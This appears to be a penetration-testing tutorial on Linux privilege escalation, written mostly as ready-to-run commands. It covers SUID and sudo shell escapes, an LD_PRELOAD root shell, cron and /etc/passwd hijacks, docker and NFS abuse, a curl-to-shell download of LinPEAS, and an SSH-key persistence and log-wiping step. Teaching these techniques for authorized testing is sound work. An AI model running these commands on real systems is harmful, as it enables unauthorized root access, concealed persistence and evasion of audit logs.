Linux Privilege Escalation: Advanced Techniques
Privilege escalation is a critical phase in penetration testing where an attacker attempts to gain higher-level permissions than initially obtained. This guide covers advanced techniques for escalating privileges on Linux systems.
Warning: These techniques should only be used in authorized penetration testing engagements or CTF challenges. Unauthorized access to computer systems is illegal.
Initial Enumeration
Before attempting any escalation, gather information about the target system.
System Information
# Basic system info
uname -a
cat /etc/os-release
hostname
# Kernel version (critical for kernel exploits)
uname -r
# Architecture
arch
User Context
# Current user and groups
id
whoami
groups
# All users on system
cat /etc/passwd
# Users with shell access
grep -v '/nologin\|/false' /etc/passwd
# Sudoers (if readable)
cat /etc/sudoers 2>/dev/null
SUID/SGID Binaries
SUID (Set User ID) binaries run with the permissions of the file owner, often root.
Finding SUID Binaries
# Find all SUID binaries
find / -perm -4000 -type f 2>/dev/null
# Find SGID binaries
find / -perm -2000 -type f 2>/dev/null
# Combined search
find / -perm -u=s -o -perm -g=s -type f 2>/dev/null
Exploitation via GTFOBins
Many standard binaries can be exploited when they have the SUID bit set. Check GTFOBins for exploitation techniques.
# Example: nmap with SUID (older versions)
nmap --interactive
!sh
# Example: find with SUID
find . -exec /bin/sh -p \; -quit
# Example: vim with SUID
vim -c ':!/bin/sh'
# Example: python with SUID
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
Linux Capabilities
Capabilities provide fine-grained control over privileges. Some can be exploited for escalation.
Enumerating Capabilities
# Find files with capabilities
getcap -r / 2>/dev/null
# Check specific binary
getcap /usr/bin/python3
Exploiting Capabilities
# cap_setuid - allows changing UID
# If python has cap_setuid+ep:
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
# cap_dac_read_search - bypass file read permission
# Read /etc/shadow with tar:
tar -cvf shadow.tar /etc/shadow
tar -xvf shadow.tar
# cap_net_bind_service - bind to privileged ports
# Useful for intercepting traffic
Sudo Misconfigurations
Checking Sudo Privileges
sudo -l
Common Exploitable Sudo Rules
# LD_PRELOAD exploitation
# If sudo -l shows: env_keep+=LD_PRELOAD
echo '#include <stdio.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setuid(0);
system("/bin/bash");
}' > /tmp/shell.c
gcc -fPIC -shared -o /tmp/shell.so /tmp/shell.c -nostartfiles
sudo LD_PRELOAD=/tmp/shell.so <allowed_command>
# NOPASSWD entries
# (root) NOPASSWD: /usr/bin/vim
sudo vim -c ':!/bin/sh'
# Wildcard exploitation
# (root) NOPASSWD: /opt/backup.sh *
# If script uses tar with wildcards, create checkpoint files
Cron Jobs
Enumeration
# System cron jobs
cat /etc/crontab
ls -la /etc/cron.*
# User crontabs
crontab -l
ls -la /var/spool/cron/crontabs/
# Monitor for scheduled tasks
# Using pspy or manual monitoring
Exploitation
# If a cron job runs a writable script:
echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' >> /path/to/writable_script.sh
# Wait for cron execution, then:
/tmp/rootbash -p
# PATH exploitation in cron
# If cron runs: * * * * * root backup.sh
# And PATH includes writable directory before /usr/bin
echo '#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod +s /tmp/rootbash' > /home/user/backup.sh
chmod +x /home/user/backup.sh
Writable /etc/passwd
If /etc/passwd is writable, add a new root user:
# Generate password hash
openssl passwd -1 -salt xyz password123
# Output: $1$xyz$HASH
# Add root user
echo 'hacker:$1$xyz$HASH:0:0:root:/root:/bin/bash' >> /etc/passwd
# Login as new root user
su hacker
Kernel Exploits
Identifying Vulnerable Kernels
uname -r
cat /proc/version
Common Kernel Exploits
| Kernel Version | Exploit | CVE |
|---|---|---|
| 2.6.22 < 3.9 | Dirty COW | CVE-2016-5195 |
| < 4.4.0-116 | DCCP Double-Free | CVE-2017-8824 |
| 4.4.0-116 < 4.15 | eBPF | CVE-2017-16995 |
| 5.8 < 5.16.11 | Dirty Pipe | CVE-2022-0847 |
# Compile and run (example with Dirty COW)
gcc -pthread dirty.c -o dirty -lcrypt
./dirty
NFS Misconfigurations
Identifying NFS Shares
# Check exports
cat /etc/exports
showmount -e <target>
no_root_squash Exploitation
# On attacker machine, mount the share
mkdir /tmp/nfs
mount -o rw,vers=3 <target>:/share /tmp/nfs
# Create SUID binary
cp /bin/bash /tmp/nfs/rootbash
chmod +s /tmp/nfs/rootbash
# On target, execute
/share/rootbash -p
Docker Privilege Escalation
If the user is in the docker group:
# Check docker group membership
id
# Mount host filesystem
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# Or with existing image
docker run -v /:/hostfs -it ubuntu /bin/bash
Automated Enumeration Tools
LinPEAS
# Download and run
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Or transfer and execute
./linpeas.sh -a 2>&1 | tee linpeas.txt
LinEnum
./LinEnum.sh -t -k password
Linux Exploit Suggester
./linux-exploit-suggester.sh
Post-Exploitation
After gaining root access:
# Capture flags
cat /root/root.txt
# Establish persistence (for authorized tests only)
echo "ssh-rsa AAAA... attacker@machine" >> /root/.ssh/authorized_keys
# Clear tracks
echo "" > /var/log/auth.log
history -c
Defensive Recommendations
- Minimize SUID binaries - Audit and remove unnecessary SUID bits
- Restrict sudo access - Use specific commands, avoid wildcards
- Monitor cron jobs - Ensure proper file permissions
- Keep kernel updated - Patch known vulnerabilities
- Use SELinux/AppArmor - Implement mandatory access controls
- Regular auditing - Use tools like Lynis for security hardening
Resources
- GTFOBins - Unix binaries exploitation
- HackTricks - Linux Privilege Escalation
- PayloadsAllTheThings
- LinPEAS